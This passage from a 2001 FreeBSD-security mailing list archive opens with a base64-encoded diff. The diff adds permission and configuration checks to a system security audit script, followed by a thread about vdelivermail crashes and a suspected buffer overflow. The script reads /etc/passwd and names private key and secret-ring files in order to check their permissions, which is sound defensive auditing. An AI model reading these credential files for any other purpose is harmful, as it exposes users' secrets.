bWFzayBvciBwYXRoLCB0aGF0IGJlaW5nIHNldCBpbiAucHJvZmlsZQ0KKyMg Y2hlY2sgYW55d2F5Lg0KKz4gJE9VVFBVVA0KK3Job21lPS9yb290DQorbGlz dD0iL2V0Yy9rc2gua3NocmMgYGNhdCAkVE1QMmAiDQorKGNkICRyaG9tZQ0K KyBmb3IgaSBpbiAkbGlzdDsgZG8NCisgICAgaWYgWyAtcyAkaSBdIDsgdGhl bg0KKyAgICAgICAgZWdyZXAgdW1hc2sgJGkgfA0KKyAgICAgICAgYXdrICck MiAlIDEwMCA8IDIwIFwNCisgICAgICAgICAgICB7IHByaW50ICJSb290IHVt YXNrIGlzIGdyb3VwIHdyaXRlYWJsZSIgfSBcDQorICAgICAgICAgICAgICQy ICUgMTAgPCAyIFwNCisgICAgICAgICAgICB7IHByaW50ICJSb290IHVtYXNr IGlzIG90aGVyIHdyaXRlYWJsZSIgfScgPj4gJE9VVFBVVA0KKyAgICAgICAg aWYgZWdyZXAgUEFUSD0gJGkgPiAvZGV2L251bGwgOyB0aGVuDQorICAgICAg ICAgICAgU0FWRV9QQVRIPSRQQVRIDQorICAgICAgICAgICAgdW5zZXQgUEFU SA0KKyAgICAgICAgICAgIC9iaW4va3NoIDw8IGVuZC1vZi1zaCA+IC9kZXYv bnVsbCAyPiYxDQorICAgICAgICAgICAgICAgIC4gJGkNCisgICAgICAgICAg ICAgICAgaWYgWyBYIlwkUEFUSCIgIT0gIlgiIF07IHRoZW4NCisgICAgICAg ICAgICAgICAgICAgIGxpc3Q9XGBlY2hvIFwkUEFUSCB8IC91c3IvYmluL3Nl ZCAtZSAncy86LyAvZydcYA0KKyAgICAgICAgICAgICAgICAgICAgL2Jpbi9s cyAtbGRnVCBcJGxpc3QgPiAkVE1QMQ0KKyAgICAgICAgICAgICAgICBlbHNl DQorICAgICAgICAgICAgICAgICAgICA+ICRUTVAxDQorICAgICAgICAgICAg ICAgIGZpDQorZW5kLW9mLXNoDQorICAgICAgICAgICAgUEFUSD0kU0FWRV9Q QVRIDQorICAgICAgICAgICAgYXdrICd7DQorICAgICAgICAgICAgICAgIGlm ICgkMTAgfiAvXlwuJC8pIHsNCisgICAgICAgICAgICAgICAgICAgIHByaW50 ICJUaGUgcm9vdCBwYXRoIGluY2x1ZGVzIC4iOw0KKyAgICAgICAgICAgICAg ICAgICAgbmV4dDsNCisgICAgICAgICAgICAgICAgfQ0KKyAgICAgICAgICAg ICAgICB9DQorICAgICAgICAgICAgICAgICQxIH4gL15kLi4uLncvIFwNCisg ICAgICAgIHsgcHJpbnQgIlJvb3QgcGF0aCBkaXJlY3RvcnkgIiAkMTAgIiBp cyBncm91cCB3cml0ZWFibGUuIiB9IFwNCisgICAgICAgICAgICAgICAgJDEg fiAvXmQuLi4uLi4udy8gXA0KKyAgICAgICAgeyBwcmludCAiUm9vdCBwYXRo IGRpcmVjdG9yeSAiICQxMCAiIGlzIG90aGVyIHdyaXRlYWJsZS4iIH0nIFwN CisgICAgICAgICAgICA8ICRUTVAxID4+ICRPVVRQVVQNCisgICAgICAgIGZp DQorDQorICAgIGZpDQorIGRvbmUNCispDQorDQorIyBSb290IGFuZCB1dWNw IHNob3VsZCBib3RoIGJlIGluIC9ldGMvZnRwdXNlcnMuDQoraWYgZWdyZXAg cm9vdCAvZXRjL2Z0cHVzZXJzID4gL2Rldi9udWxsIDsgdGhlbg0KKyAgICA6 DQorZWxzZQ0KKyAgICBlY2hvICJcblJvb3Qgbm90IGxpc3RlZCBpbiAvZXRj L2Z0cHVzZXJzIGZpbGUuIg0KK2ZpDQoraWYgZWdyZXAgdXVjcCAvZXRjL2Z0 cHVzZXJzID4gL2Rldi9udWxsIDsgdGhlbg0KKyAgICA6DQorZWxzZQ0KKyAg ICBlY2hvICJcblV1Y3Agbm90IGxpc3RlZCBpbiAvZXRjL2Z0cHVzZXJzIGZp bGUuIg0KK2ZpDQorDQorIyBVdWRlY29kZSBzaG91bGQgbm90IGJlIGluIHRo ZSAvZXRjL21haWwvYWxpYXNlcyBmaWxlLg0KK2lmIGVncmVwICd1dWRlY29k ZXxkZWNvZGUnIC9ldGMvbWFpbC9hbGlhc2VzOyB0aGVuDQorICAgIGVjaG8g IlxuVGhlcmUgaXMgYW4gZW50cnkgZm9yIHV1ZGVjb2RlIGluIHRoZSAvZXRj L21haWwvYWxpYXNlcyBmaWxlLiINCitmaQ0KKw0KKyMgRmlsZXMgdGhhdCBz aG91bGQgbm90IGhhdmUgKyBzaWducy4NCitsaXN0PSIvZXRjL2hvc3RzLmVx dWl2IC9ldGMvc2hvc3RzLmVxdWl2IC9ldGMvaG9zdHMubHBkIg0KK2ZvciBm IGluICRsaXN0IDsgZG8NCisgICAgaWYgWyAtcyAkZiBdIDsgdGhlbg0KKyAg ICAgICAgYXdrICd7DQorICAgICAgICAgICAgaWYgKCQwIH4gL15cK0AuKiQv KQ0KKyAgICAgICAgICAgICAgICBuZXh0Ow0KKyAgICAgICAgICAgIGlmICgk MCB+IC9eXCsuKiQvKQ0KKyAgICAgICAgICAgICAgICBwcmludGYoIlxuUGx1 cyBzaWduIGluICVzIGZpbGUuXG4iLCBGSUxFTkFNRSk7DQorICAgICAgICB9 JyAkZg0KKyAgICBmaQ0KK2RvbmUNCisNCisjIENoZWNrIGZvciBzcGVjaWFs IHVzZXJzIHdpdGggLnJob3N0cy8uc2hvc3RzIGZpbGVzLiAgT25seSByb290 DQorIyBzaG91bGQgaGF2ZSAucmhvc3RzLy5zaG9zdHMgZmlsZXMuICBBbHNv LCAucmhvc3RzLy5zaG9zdHMNCisjIGZpbGVzIHNob3VsZCBub3QgaGF2ZSBw bHVzIHNpZ25zLg0KK2F3ayAtRjogJyQxICE9ICJyb290IiAmJiAkMSAhfiAv XlsrLV0vICYmIFwNCisgICAgKCQzIDwgMTAwIHx8ICQxID09ICJmdHAiIHx8 ICQxID09ICJ1dWNwIikgXA0KKyAgICAgICAgeyBwcmludCAkMSAiICIgJDYg fScgL2V0Yy9wYXNzd2QgfA0KK3doaWxlIHJlYWQgdWlkIGhvbWVkaXI7IGRv DQorICAgIGZvciBqIGluIC5yaG9zdHMgLnNob3N0czsgZG8NCisgICAgICAg ICMgUm9vdCBvd25lZCAucmhvc3RzLy5zaG9zdHMgZmlsZXMgYXJlIG9rLg0K KyAgICAgICAgaWYgWyAtcyAke2hvbWVkaXJ9LyRqIC1hICEgLU8gJHtob21l ZGlyfS8kaiBdIDsgdGhlbg0KKyAgICAgICAgICAgIHJob3N0PWBscyAtbGRn VCAke2hvbWVkaXJ9LyRqYA0KKyAgICAgICAgICAgIGVjaG8gIiR7dWlkfTog JHtyaG9zdH0iDQorICAgICAgICBmaQ0KKyAgICBkb25lDQorZG9uZSA+ICRP VVRQVVQNCitpZiBbIC1zICRPVVRQVVQgXSA7IHRoZW4NCisgICAgZWNobyAi XG5DaGVja2luZyBmb3Igc3BlY2lhbCB1c2VycyB3aXRoIC5yaG9zdHMvLnNo b3N0cyBmaWxlcy4iDQorICAgIGNhdCAkT1VUUFVUDQorZmkNCisNCithd2sg LUY6ICcvXlteKy1dLyB7IHByaW50ICQxICIgIiAkNiB9JyAvZXRjL3Bhc3N3 ZCB8IFwNCit3aGlsZSByZWFkIHVpZCBob21lZGlyOyBkbw0KKyAgICBmb3Ig aiBpbiAucmhvc3RzIC5zaG9zdHM7IGRvDQorICAgICAgICBpZiBbIC1zICR7 aG9tZWRpcn0vJGogXSA7IHRoZW4NCisgICAgICAgICAgICBhd2sgJ3sNCisg ICAgICAgICAgICAgICAgaWYgKCQwIH4gL14rQC4qJC8gKQ0KKyAgICAgICAg ICAgICAgICAgICAgbmV4dDsNCisgICAgICAgICAgICAgICAgaWYgKCQwIH4g L15cK1sgIF0qJC8gKQ0KKyAgICAgICAgICAgICAgICAgICAgcHJpbnRmKCIl cyBoYXMgKyBzaWduIGluIGl0LlxuIiwNCisgICAgICAgICAgICAgICAgICAg ICAgICBGSUxFTkFNRSk7DQorICAgICAgICAgICAgfScgJHtob21lZGlyfS8k ag0KKyAgICAgICAgZmkNCisgICAgZG9uZQ0KK2RvbmUgPiAkT1VUUFVUDQor aWYgWyAtcyAkT1VUUFVUIF0gOyB0aGVuDQorICAgIGVjaG8gIlxuQ2hlY2tp bmcgLnJob3N0cy8uc2hvc3RzIGZpbGVzIHN5bnRheC4iDQorICAgIGNhdCAk T1VUUFVUDQorZmkNCisNCisjIENoZWNrIGhvbWUgZGlyZWN0b3JpZXMuICBE aXJlY3RvcmllcyBzaG91bGQgbm90IGJlIG93bmVkIGJ5IHNvbWVvbmUgZWxz ZQ0KKyMgb3Igd3JpdGVhYmxlLg0KK2F3ayAtRjogJy9eW14rLV0vIHsgcHJp bnQgJDEgIiAiICQ2IH0nIC9ldGMvcGFzc3dkIHwgXA0KK3doaWxlIHJlYWQg dWlkIGhvbWVkaXI7IGRvDQorICAgIGlmIFsgLWQgJHtob21lZGlyfS8gXSA7 IHRoZW4NCisgICAgICAgIGZpbGU9YGxzIC1sZGdUICR7aG9tZWRpcn1gDQor ICAgICAgICBlY2hvICIke3VpZH0gJHtmaWxlfSINCisgICAgZmkNCitkb25l IHwNCithd2sgJyQxICE9ICQ0ICYmICQ0ICE9ICJyb290IiBcDQorICAgIHsg cHJpbnQgInVzZXIgIiAkMSAiIGhvbWUgZGlyZWN0b3J5IGlzIG93bmVkIGJ5 ICIgJDQgfQ0KKyAgICAgJDIgfiAvXi0uLi4udy8gXA0KKyAgICB7IHByaW50 ICJ1c2VyICIgJDEgIiBob21lIGRpcmVjdG9yeSBpcyBncm91cCB3cml0ZWFi bGUiIH0NCisgICAgICQyIH4gL14tLi4uLi4uLncvIFwNCisgICAgeyBwcmlu dCAidXNlciAiICQxICIgaG9tZSBkaXJlY3RvcnkgaXMgb3RoZXIgd3JpdGVh YmxlIiB9JyA+ICRPVVRQVVQNCitpZiBbIC1zICRPVVRQVVQgXSA7IHRoZW4N CisgICAgZWNobyAiXG5DaGVja2luZyBob21lIGRpcmVjdG9yaWVzLiINCisg ICAgY2F0ICRPVVRQVVQNCitmaQ0KKw0KKyMgRmlsZXMgdGhhdCBzaG91bGQg bm90IGJlIG93bmVkIGJ5IHNvbWVvbmUgZWxzZSBvciByZWFkYWJsZS4NCits aXN0PSIubmV0cmMgLnJob3N0cyAuZ251cGcvc2VjcmluZy5ncGcgLmdudXBn L3JhbmRvbV9zZWVkIFwNCisgICAgLnBncC9zZWNyaW5nLnBncCAuc2hvc3Rz IC5zc2gvaWRlbnRpdHkgLnNzaC9pZF9kc2EgLnNzaC9pZF9yc2EiDQorYXdr IC1GOiAnL15bXistXS8geyBwcmludCAkMSAiICIgJDYgfScgL2V0Yy9wYXNz d2QgfCBcDQord2hpbGUgcmVhZCB1aWQgaG9tZWRpcjsgZG8NCisgICAgZm9y IGYgaW4gJGxpc3QgOyBkbw0KKyAgICAgICAgZmlsZT0ke2hvbWVkaXJ9LyR7 Zn0NCisgICAgICAgIGlmIFsgLWYgJGZpbGUgXSA7IHRoZW4NCisgICAgICAg ICAgICBlY2hvICIke3VpZH0gJHtmfSBgbHMgLWxkZ1QgJHtmaWxlfWAiDQor ICAgICAgICBmaQ0KKyAgICBkb25lDQorZG9uZSB8DQorYXdrICckMSAhPSAk NSAmJiAkNSAhPSAicm9vdCIgXA0KKyAgICB7IHByaW50ICJ1c2VyICIgJDEg IiAiICQyICIgZmlsZSBpcyBvd25lZCBieSAiICQ1IH0NCisgICAgICQzIH4g L14tLi4uci8gXA0KKyAgICB7IHByaW50ICJ1c2VyICIgJDEgIiAiICQyICIg ZmlsZSBpcyBncm91cCByZWFkYWJsZSIgfQ0KKyAgICAgJDMgfiAvXi0uLi4u Li5yLyBcDQorICAgIHsgcHJpbnQgInVzZXIgIiAkMSAiICIgJDIgIiBmaWxl IGlzIG90aGVyIHJlYWRhYmxlIiB9DQorICAgICAkMyB+IC9eLS4uLi53LyBc DQorICAgIHsgcHJpbnQgInVzZXIgIiAkMSAiICIgJDIgIiBmaWxlIGlzIGdy b3VwIHdyaXRlYWJsZSIgfQ0KKyAgICAgJDMgfiAvXi0uLi4uLi4udy8gXA0K KyAgICB7IHByaW50ICJ1c2VyICIgJDEgIiAiICQyICIgZmlsZSBpcyBvdGhl ciB3cml0ZWFibGUiIH0nID4gJE9VVFBVVA0KKw0KKyMgRmlsZXMgdGhhdCBz aG91bGQgbm90IGJlIG93bmVkIGJ5IHNvbWVvbmUgZWxzZSBvciB3cml0ZWFi bGUuDQorbGlzdD0iLmJhc2hyYyAuYmFzaF9wcm9maWxlIC5iYXNoX2xvZ2lu IC5iYXNoX2xvZ291dCAuY3NocmMgXA0KKyAgICAgIC5lbWFjcyAuZXhyYyAu Zm9yd2FyZCAuZnZ3bXJjIC5pbnB1dHJjIC5rbG9naW4gLmtzaHJjIC5sb2dp biBcDQorICAgICAgLmxvZ291dCAubmV4cmMgLnByb2ZpbGUgLnNjcmVlbnJj IC5zc2ggLnNzaC9jb25maWcgXA0KKyAgICAgIC5zc2gvYXV0aG9yaXplZF9r ZXlzIC5zc2gvYXV0aG9yaXplZF9rZXlzMiAuc3NoL2Vudmlyb25tZW50IFwN CisgICAgICAuc3NoL2tub3duX2hvc3RzIC5zc2gvcmMgLnRjc2hyYyAudHdt cmMgLnhzZXNzaW9uIC54aW5pdHJjIFwNCisgICAgICAuWGRlZmF1bHRzIC5Y YXV0aG9yaXR5Ig0KK2F3ayAtRjogJy9eW14rLV0vIHsgcHJpbnQgJDEgIiAi ICQ2IH0nIC9ldGMvcGFzc3dkIHwgXA0KK3doaWxlIHJlYWQgdWlkIGhvbWVk aXI7IGRvDQorICAgIGZvciBmIGluICRsaXN0IDsgZG8NCisgICAgICAgIGZp bGU9JHtob21lZGlyfS8ke2Z9DQorICAgICAgICBpZiBbIC1mICRmaWxlIF0g OyB0aGVuDQorICAgICAgICAgICAgZWNobyAiJHt1aWR9ICR7Zn0gYGxzIC1s ZGdUICR7ZmlsZX1gIg0KKyAgICAgICAgZmkNCisgICAgZG9uZQ0KK2RvbmUg fA0KK2F3ayAnJDEgIT0gJDUgJiYgJDUgIT0gInJvb3QiIFwNCisgICAgeyBw cmludCAidXNlciAiICQxICIgIiAkMiAiIGZpbGUgaXMgb3duZWQgYnkgIiAk NSB9DQorICAgICAkMyB+IC9eLS4uLi53LyBcDQorICAgIHsgcHJpbnQgInVz ZXIgIiAkMSAiICIgJDIgIiBmaWxlIGlzIGdyb3VwIHdyaXRlYWJsZSIgfQ0K KyAgICAgJDMgfiAvXi0uLi4uLi4udy8gXA0KKyAgICB7IHByaW50ICJ1c2Vy ICIgJDEgIiAiICQyICIgZmlsZSBpcyBvdGhlciB3cml0ZWFibGUiIH0nID4+ ICRPVVRQVVQNCitpZiBbIC1zICRPVVRQVVQgXSA7IHRoZW4NCisgICAgZWNo byAiXG5DaGVja2luZyBkb3QgZmlsZXMuIg0KKyAgICBjYXQgJE9VVFBVVA0K K2ZpDQorDQorIyBNYWlsYm94ZXMgc2hvdWxkIGJlIG93bmVkIGJ5IHVzZXIg YW5kIHVucmVhZGFibGUuDQorbHMgLWwgL3Zhci9tYWlsIHwgc2VkIDFkIHwg XA0KK2F3ayAnJDMgIT0gJDkgXA0KKyAgICB7IHByaW50ICJ1c2VyICIgJDkg IiBtYWlsYm94IGlzIG93bmVkIGJ5ICIgJDMgfQ0KKyAgICAgJDEgIT0gIi1y dy0tLS0tLS0iIFwNCisgICAgeyBwcmludCAidXNlciAiICQ5ICIgbWFpbGJv eCBpcyAiICQxICIsIGdyb3VwICIgJDQgfScgPiAkT1VUUFVUDQoraWYgWyAt cyAkT1VUUFVUIF0gOyB0aGVuDQorICAgIGVjaG8gIlxuQ2hlY2tpbmcgbWFp bGJveCBvd25lcnNoaXAuIg0KKyAgICBjYXQgJE9VVFBVVA0KK2ZpDQorDQor IyBGaWxlIHN5c3RlbXMgc2hvdWxkIG5vdCBiZSBnbG9iYWxseSBleHBvcnRl ZC4NCitpZiBbIC1zIC9ldGMvZXhwb3J0cyBdIDsgdGhlbg0KKyAgICBhd2sg J3sNCisgICAgICAgIGlmICgoJDEgfiAvXiMvKSB8fCAoJDEgfiAvXiQvKSkN CisgICAgICAgICAgICBuZXh0Ow0KKyAgICAgICAgcmVhZG9ubHkgPSAwOw0K KyAgICAgICAgZm9yIChpID0gMjsgaSA8PSBORjsgKytpKSB7DQorICAgICAg ICAgICAgaWYgKCRpIH4gL14tcm8kLykNCisgICAgICAgICAgICAgICAgcmVh ZG9ubHkgPSAxOw0KKyAgICAgICAgICAgIGVsc2UgaWYgKCRpICF+IC9eLS8p DQorICAgICAgICAgICAgICAgIG5leHQ7DQorICAgICAgICB9DQorICAgICAg ICBpZiAocmVhZG9ubHkpDQorICAgICAgICAgICAgcHJpbnQgIkZpbGUgc3lz dGVtICIgJDEgIiBnbG9iYWxseSBleHBvcnRlZCwgcmVhZC1vbmx5LiINCisg ICAgICAgIGVsc2UNCisgICAgICAgICAgICBwcmludCAiRmlsZSBzeXN0ZW0g IiAkMSAiIGdsb2JhbGx5IGV4cG9ydGVkLCByZWFkLXdyaXRlLiINCisgICAg fScgPCAvZXRjL2V4cG9ydHMgPiAkT1VUUFVUDQorICAgIGlmIFsgLXMgJE9V VFBVVCBdIDsgdGhlbg0KKyAgICAgICAgZWNobyAiXG5DaGVja2luZyBmb3Ig Z2xvYmFsbHkgZXhwb3J0ZWQgZmlsZSBzeXN0ZW1zLiINCisgICAgICAgIGNh dCAkT1VUUFVUDQorICAgIGZpDQorZmkNCiANCiBlY2hvICdDaGVja2luZyBz ZXR1aWQgZmlsZXMgYW5kIGRldmljZXM6Jw0KIA0K --1876168249-1983639606-990478082=:17879-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 21 17:25:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from closed-networks.com (shady.org [195.153.248.241]) by hub.freebsd.org (Postfix) with SMTP id 8C6AF37B424 for ; Mon, 21 May 2001 17:25:24 -0700 (PDT) (envelope-from marcr@closed-networks.com) Received: (qmail 23978 invoked by uid 1000); 22 May 2001 00:28:57 -0000 Date: Tue, 22 May 2001 01:28:57 +0100 From: Marc Rogers To: freebsd-security@freebsd.org Subject: Re: Qmail + FreeBSD 4.3 Message-ID: <20010522012857.R366@shady.org> References: <44ae4669z0.fsf@lowellg.ne.mediaone.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: ; from subscribed@de-net.org on Mon, May 21, 2001 at 12:27:34PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, May 21, 2001 at 12:27:34PM -0700, Dan Graaff wrote: > Hello all.. > Hello > After the recent hacking of my affiliate, I'm starting to get worried about > my own qmail boxes. One of them has had no errors for a month, now I'm > starting to get these in my root mailers: > > xxxxxxx.xxxxxxxxxxx.xxx kernel log messages: > > ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P > > pid 28411 (vdelivermail), uid 89: exited on signal 11 (core dumped) > > pid 28548 (vdelivermail), uid 89: exited on signal 11 (core dumped) > > pid 36631 (vdelivermail), uid 89: exited on signal 11 (core dumped) > > Any thoughts? Help? Well it wont be the first time that a virtual domains package has had an overflow of some kind in it. Infact if memory serves me correctly this was the same virtual domains package that had a hole in it that was released to bugtraq last year. looking at the most recent version of vpopmail..... bash-2.04$ grep sprintf vdelivermail.c|wc -l 20 and a quick grep for two of the buffers found reveals.... vdelivermail.c: char tmp_buf[256]; configure:char tmpbuf[100]; I would suggest that this code has all the right conditions for a nasty buffer overflow. I havent got the time to read through it tonight, as its 1am and im too tired to be interested though. To be honest though, what you are seeing in your logs is more likely to be this code puking on something in mail, as its happening a little too frequently to be an attacker. [What sort of time lapse is there between those segfaults?] I definately wouldnt rule out the possibility though. I would seriously think about a different virtual domains package. That code looks dangerous. > > -Dan Graaff / Digital > > Marc Rogers Technical Director European Data Corporation To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 21 18: 6:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from euphoria.digitalextreme.org (euphoria.digitalextreme.org [204.212.149.31]) by hub.freebsd.org (Postfix) with SMTP id B2B8537B422 for ; Mon, 21 May 2001 18:06:32 -0700 (PDT) (envelope-from subscribed@de-net.org) Received: (qmail 5949 invoked by uid 504); 21 May 2001 18:02:02 -0000 Received: from unknown (HELO extremist) (204.212.149.57) by euphoria.digitalextreme.org with SMTP; 21 May 2001 18:02:02 -0000 From: "Dan Graaff" To: Subject: RE: Qmail + FreeBSD 4.3 Date: Mon, 21 May 2001 18:05:41 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal In-Reply-To: <20010522012857.R366@shady.org> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hey all.. It started again.. May 21 13:19:22 euphoria /kernel: pid 1387 (vdelivermail), uid 89: exited on signal 11 (core dumped) May 21 13:24:33 euphoria /kernel: pid 1515 (vdelivermail), uid 89: exited on signal 11 (core dumped) May 21 15:44:16 euphoria /kernel: pid 3850 (vdelivermail), uid 89: exited on signal 11 (core dumped) May 21 16:27:44 euphoria /kernel: pid 4463 (vdelivermail), uid 89: exited on signal 11 (core dumped) May 21 16:36:17 euphoria /kernel: pid 4593 (vdelivermail), uid 89: exited on signal 11 (core dumped) This time I included the time :-/ Now, thats my mail server, the main webserver is getting strange IPs hitting it on SSH... I think im being attacked for sure.. May 21 15:43:24 insomnia sshd[11557]: DNS lookup failed for "216.231.201.31". May 21 15:44:08 insomnia sshd[11562]: DNS lookup failed for "216.231.201.31". May 21 15:44:09 insomnia sshd[11562]: error: ConnectionsPerPeriod has been deprecated! May 21 15:44:09 insomnia sshd[11562]: error: Could not load host key: /etc/ssh/ssh_host_key: No such file or directory May 21 15:44:09 insomnia sshd[11562]: error: Could not load DSA host key: /etc/ssh/ssh_host_dsa_key May 21 15:48:39 insomnia sshd[11575]: DNS lookup failed for "216.231.201.31". May 21 15:48:39 insomnia sshd[11575]: error: ConnectionsPerPeriod has been deprecated! May 21 15:48:39 insomnia sshd[11575]: error: Could not load host key: /etc/ssh/ssh_host_key: No such file or directory May 21 15:48:39 insomnia sshd[11575]: error: Could not load DSA host key: /etc/ssh/ssh_host_dsa_key May 21 15:51:35 insomnia sshd[11592]: DNS lookup failed for "209.133.41.29". There is no reason for people to be using SSH, or telnet! I have no non-staff shell accounts open! I THINK im being attacked and I cant figure out if they are penetrating or not.. Thanks a lot for your help, -Dan Graaff / Digital The DE-Network -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Marc Rogers Sent: Monday, May 21, 2001 5:29 PM To: freebsd-security@freebsd.org Subject: Re: Qmail + FreeBSD 4.3 On Mon, May 21, 2001 at 12:27:34PM -0700, Dan Graaff wrote: > Hello all.. > Hello > After the recent hacking of my affiliate, I'm starting to get worried about > my own qmail boxes. One of them has had no errors for a month, now I'm > starting to get these in my root mailers: > > xxxxxxx.xxxxxxxxxxx.xxx kernel log messages: > > ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P > > pid 28411 (vdelivermail), uid 89: exited on signal 11 (core dumped) > > pid 28548 (vdelivermail), uid 89: exited on signal 11 (core dumped) > > pid 36631 (vdelivermail), uid 89: exited on signal 11 (core dumped) > > Any thoughts? Help? Well it wont be the first time that a virtual domains package has had an overflow of some kind in it. Infact if memory serves me correctly this was the same virtual domains package that had a hole in it that was released to bugtraq last year. looking at the most recent version of vpopmail..... bash-2.04$ grep sprintf vdelivermail.c|wc -l 20 and a quick grep for two of the buffers found reveals.... vdelivermail.c: char tmp_buf[256]; configure:char tmpbuf[100]; I would suggest that this code has all the right conditions for a nasty buffer overflow. I havent got the time to read through it tonight, as its 1am and im too tired to be interested though. To be honest though, what you are seeing in your logs is more likely to be this code puking on something in mail, as its happening a little too frequently to be an attacker. [What sort of time lapse is there between those segfaults?] I definately wouldnt rule out the possibility though. I would seriously think about a different virtual domains package. That code looks dangerous. > > -Dan Graaff / Digital > > Marc Rogers Technical Director European Data Corporation To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 21 18:16:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from cs4.cs.ait.ac.th (cs4.cs.ait.ac.th [192.41.170.16]) by hub.freebsd.org (Postfix) with ESMTP id 7717637B42C for ; Mon, 21 May 2001 18:16:44 -0700 (PDT) (envelope-from on@cs.ait.ac.th) Received: from banyan.cs.ait.ac.th (on@banyan.cs.ait.ac.th [192.41.170.5]) by cs4.cs.ait.ac.th (8.9.3/8.9.3) with ESMTP id IAA15448; Tue, 22 May 2001 08:14:01 +0700 (GMT+0700) Received: (from on@localhost) by banyan.cs.ait.ac.th (8.8.5/8.8.5) id IAA11516; Tue, 22 May 2001 08:16:56 +0700 (ICT) Date: Tue, 22 May 2001 08:16:56 +0700 (ICT) Message-Id: <200105220116.IAA11516@banyan.cs.ait.ac.th> X-Authentication-Warning: banyan.cs.ait.ac.th: on set sender to on@banyan.cs.ait.ac.th using -f From: Olivier Nicole To: subscribed@de-net.org Cc: freebsd-security@FreeBSD.ORG In-reply-to: Subject: Re: Qmail + FreeBSD 4.3 References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi Dan, Signa 11 often denotes some hardware problem I guess, something like overheating. Olivier To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 21 18:37: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from tomts7-srv.bellnexxia.net (tomts7.bellnexxia.net [209.226.175.40]) by hub.freebsd.org (Postfix) with ESMTP id 705D437B422 for ; Mon, 21 May 2001 18:36:57 -0700 (PDT) (envelope-from glassfish@glassfish.net) Received: from frogbox.glassfish.net ([64.230.25.230]) by tomts7-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with SMTP id <20010522013655.ZVUZ16174.tomts7-srv.bellnexxia.net@frogbox.glassfish.net> for ; Mon, 21 May 2001 21:36:55 -0400 Received: (qmail 3282 invoked from network); 22 May 2001 01:39:37 -0000 Received: from unknown (HELO MAINWS) (192.0.0.20) by 192.0.0.4 with SMTP; 22 May 2001 01:39:37 -0000 From: "Michael Tang Helmeste" To: Subject: RE: Qmail + FreeBSD 4.3 Date: Mon, 21 May 2001 21:35:52 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <200105220116.IAA11516@banyan.cs.ait.ac.th> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org actually it just means segmentation fault it happens when a program accesses some memory that it doesn't own -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Olivier Nicole Sent: Monday, May 21, 2001 9:17 PM To: subscribed@de-net.org Cc: freebsd-security@FreeBSD.ORG Subject: Re: Qmail + FreeBSD 4.3 Hi Dan, Signa 11 often denotes some hardware problem I guess, something like overheating. Olivier To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 21 19:57:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from fritz.cc.gt.atl.ga.us (fritz.cc.gt.atl.ga.us [199.77.128.120]) by hub.freebsd.org (Postfix) with ESMTP id ECFE037B446 for ; Mon, 21 May 2001 19:57:49 -0700 (PDT) (envelope-from dagon@fritz.cc.gt.atl.ga.us) Received: (from dagon@localhost) by fritz.cc.gt.atl.ga.us (8.9.3/8.9.3) id XAA20983; Mon, 21 May 2001 23:28:54 -0400 (EDT) (envelope-from dagon) Date: Mon, 21 May 2001 23:28:53 -0400 From: David Dagon To: Michael Tang Helmeste Cc: freebsd-security@FreeBSD.ORG Subject: Re: Qmail + FreeBSD 4.3 Message-ID: <20010521232853.A20683@fritz.cc.gt.atl.ga.us> References: <200105220116.IAA11516@banyan.cs.ait.ac.th> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: ; from glassfish@frogbox.dyndns.org on Mon, May 21, 2001 at 09:35:52PM -0400 X-Echelon: RSA Crypto C4 Mossad 